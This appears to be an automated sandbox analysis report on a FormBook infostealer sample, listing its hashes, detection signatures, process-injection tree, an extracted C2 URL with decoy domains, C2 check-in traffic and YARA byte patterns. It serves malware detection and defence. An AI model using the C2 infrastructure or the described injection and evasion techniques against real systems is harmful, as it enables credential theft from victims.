Analysis Report PO.exe

Overview

General Information

Sample Name: PO.exe
Analysis ID: 383909
MD5: ba83b33d39ca6c3bf1f311d1b6a38d1a
SHA1: ce0bcbb882b1a2105138b9955c1d892e4c6f0947
SHA256: ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO.exe (PID: 5720 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
    • PO.exe (PID: 2904 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 4500 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.PO.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.2.PO.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PO.exe | Virustotal: Detection: 15%
Source: PO.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: 1.2.PO.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.chkdsk.exe.2a5660.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.chkdsk.exe.54ef834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.PO.exe.2670000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.PO.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: PO.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb | source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
Source: Binary string: chkdsk.pdbGCTL | source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb | source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\PO.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\PO.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.riceandginger.com/fcn/
Source: global traffic | HTTP traffic detected: GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1 | Host: www.riceandginger.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: unknown | DNS traffic detected: queries for: www.ayescarrental.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\PO.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419DB3 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F3B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A2A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A2AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A2A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A29770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_2_00A2A770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PO.exe Code function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 8_2_04B49D60 NtCreateFile,
